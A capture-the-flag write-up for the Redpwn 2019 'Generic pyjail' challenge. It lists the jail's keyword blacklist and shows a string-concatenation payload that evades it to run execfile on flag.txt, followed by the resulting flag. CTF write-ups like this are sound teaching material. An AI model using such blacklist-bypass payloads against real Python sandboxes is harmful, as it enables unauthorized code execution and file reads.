Writeup: Redpwn 2019 - Generic pyjail

(Updated: )
writeups
, , , ,

Information

  • category: misc
  • points: 50

Description

When has a blacklist of insecure keywords EVER failed?

blacklist.txt

nc chall2.2019.redpwn.net 6006

Writeup

Connecting with netcat to the server just output a typical python command line interface.

We can not input any of the blacklist.txt words, doing this will end the connection to the server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import
ast
eval
=
pickle
os
subprocess
i love blacklisting words!
input
sys
windows users
print
execfile
hungrybox
builtins
open
most of these are in here just to confuse you
_
dict
[
>
<
:
;
]
exec
hah almost forgot that one
for
@
dir
yah have fun
file

Working around I found that concatenating one or more string will work perfectly, the function that searches for blacklisted words won’t trigger any error; then our input is probably passed to the exec function. Trying to execute flag.txt with execfile function will output the line of the file where python couldn’t comprehend the syntax, and here is the flag.

1
2
3
4
5
6
7
8
9
'exe'+'cfil'+'e("flag.txt")'
Traceback (most recent call last):
  File "jail1.py", line 52, in <module>
    exec(data)
  File "<string>", line 1, in <module>
  File "flag.txt", line 1
    flag{bl4ckl1sts_w0rk_gre3344T!}
        ^
SyntaxError: invalid syntax

Flag

flag{bl4ckl1sts_w0rk_gre3344T!}